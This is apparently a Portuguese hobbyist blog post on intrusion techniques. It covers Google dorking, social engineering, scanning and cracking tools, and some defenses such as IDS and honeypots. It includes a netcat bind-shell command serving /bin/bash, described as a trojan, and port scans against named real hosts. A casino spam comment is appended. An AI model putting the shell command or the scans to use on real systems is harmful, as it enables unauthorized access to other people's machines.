Não vou falar de todas as tecnicas, até porque eu nao sei de todas existentes. vou falar das mais utilizadas...
Técnicas de Invasão
1º – tem que se definir o alvo
2º – Recolher informações sobre o alvo
3º – Usar ferramentas para a invasão4º – Phishing5º – Esteganografia
<———Tecnicas invasao—————>
1 – definir um alvo
Para definir um alvo, podes usar o google, myspace, orkut, google groups.Exemplo: google* Podes fazer buscas especificas utilizando recursos avançados do google como as tags,Intitle, Inurl, Intext.
Esses recursos podem trazer belos resultados, ou seja, pessoal o GOOGLE É O NOSSO MELHOR AMIGO :)
2 – Engenharia socialengenharia social “é a arte de enganar”Ou seja, através de uma simples conversa de msn podes tentar de forma "manipuladora" recolher algumas informações para te facilitarem a descobrir uma pass ou user (exemplo)
<———Ferramentas para invasão—————>
Existem milhares de ferramentas para penetration(invasão), Porem vou mostrar aqui as melhores, “que eu acho”, (para a ferramenta ser boa, tens que gostar dela! e saber usar).
Dig, Nmap, Nessus, Metasploit, Telnet, Sendip, John the ripper, Host, Hping3, Netcat.=> Dig – É ferramenta quase igual ao nslookup, Porem mais flexível, pode ser utilizada para fazer buscas como A, TXT, MX E NS.
dig +qr google.com any
;; ANSWER SECTION:
google.com. 10186 IN MX 10 smtp2.google.com.
google.com. 10186 IN MX 10 smtp3.google.com.google.com. 10186 IN MX 10 smtp4.google.com.
google.com. 10186 IN MX 10 smtp1.google.com.
google.com. 318637 IN NS ns1.google.com.
google.com. 318637 IN NS ns2.google.com.
google.com. 318637 IN NS ns3.google.com.google.com. 318637 IN NS ns4.google.com.
;; AUTHORITY SECTION:google.com. 318637 IN NS ns2.google.com.
google.com. 318637 IN NS ns3.google.com.
google.com. 318637 IN NS ns4.google.com.
google.com. 318637 IN NS ns1.google.com.
;; ADDITIONAL SECTION:
smtp1.google.com. 2986 IN A 72.14.203.25smtp2.google.com. 2986 IN A 64.233.167.25
smtp3.google.com. 2986 IN A 64.233.183.25
smtp4.google.com. 2986 IN A 72.14.215.25ns1.google.com. 345220 IN A 216.239.32.10
ns2.google.com. 345220 IN A 216.239.34.10
ns3.google.com. 345219 IN A 216.239.36.10
ns4.google.com. 345219 IN A 216.239.38.10
=>portScan - O portscan vai "batendo" em cada uma das portas e vê quais estão abertas. Um exemplo de portscan é o nmap. Nmap é um brilhante portScan existente no dia de hoje. É uma otima ferramenta, muito utilizada para invasão, para descobrir falhas nos sistemas e descobrir portas abertas desnecessariamente.
=>Nessus - o Nessus é uma ferramentas de auditoria muito usada para detectar e corrigir vulnerabilidades nos computadores da rede local. Nessus encontra bugs e mostra o link de sites para corrigir os BUGS.
=> Metasploit - Esta é a melhor ferramenta que existe. É utilizado para escrever, testar e executar codigos de exploit. Foi desenvolvido para penetração em sistemas através de programas com bugs(erros).
Metasploit > console e interface web.
=> Telnet - É um protocolo para conectares-te remotamente a sistemas.
telnet www.cmpontadelgada.com 80
Trying 200.189.171.181…
Connected to www.cmpontadelgada.com
Escape character is ‘^]’.
GET / HTTP/1.1
Host: www.cmpontadelgada.com
=> John the ripper - É um programa usado para desencriptar senhas unix, dos, winNT win95 e também MD5, DES baseado na função CRYPT.
=> Hping3 - Ferramenta capaz de enviar pacotes TCP, UDP E ICMP personalizados e receber respostas como consegue em icmp. com ele podemos fazer um ataque DoS.
=> Netcat - Programa para consultoria de redes muitoconhecido, isso deve-se ao facto de ele ser um
programa muito versátil.
TROJAN/nc
nc -l -e /bin/bash -p 1033
A porta 1033 será colocada em listenning, redireccionaremos a saída de dados para um shell (/bin/bash). Assim quando alguém
conectar a essa porta terá domínio total sobre
o computador.
Sniffer/nc
# nc -vv -z 75.126.176.71 -p 80 22 110 25 21
servidor9.molservidores.com [75.126.176.71] 22 (ssh) : Connection refused
servidor9.molservidores.com [75.126.176.71] 110 (pop3) open
servidor9.molservidores.com [75.126.176.71] 25 (smtp) open
servidor9.molservidores.com [75.126.176.71] 21 (ftp) open
=> Phishing - Phishing é um tipo de fraude projectada para
roubar a identidade de alguém. Num phishing scam,
uma pessoa mal-intencionada tenta obter
informações como números de cartões de
crédito, senhas, dados de contas ou outras
informações pessoais convencendo a vitima a
fornecê-la sob pretextos enganosos.=> jp(hide an seek) - O jphide e o jpseek são programas utilizados para esconder mensagens em arquivos JPEG.
<—————–Técnicas CONTRA-INVASÃO——————->
Firewall
(NHWK)IDS
HoneyPots
Antispam
=> Firewall - Port Knock, uma solução leve e fácil de
configurar, permite que portas específicas só
sejam abertas no momento desejado através
de tentativas de conexão em portas
específicas.
=>(NHWK)IDS –
NIDS – Network Intrusion Detection System
HIDS – Host-based Intrusion Detection System
WIDS – Wireless Intrusion Detection System
KIDS – Kernel Intrusion Detection System
=> HoneyPots - Útil para vigilância e alerta aos tipos de
ataques mais utilizados porem deve ser
utilizado com cuidado para que o invasor não
tenha acesso á rede real. Pessoal na minha opinião um bom HoneyPot pode levar o Hacker a pensar que está dentro do nosso sistema mas ele está apenas num ambiente virtual :)
=> Antispam - Indispensável para qualquer MX, útil para evitar
email e domínios não confiáveis,
pode ser incrementado com opções de RBL e
CAPTCHA (“Completely Automated Public
Turing test to tell Computers and Humans
Apart”).
Cumprimentos,
Pirata Da Fajã
1 comentário:
How to make money from casino games - Work Tomake Money
You can make septcasino money หาเงินออนไลน์ from casino games. You can make money from casino games. and even bet on sports and get 1xbet into horse racing.
Enviar um comentário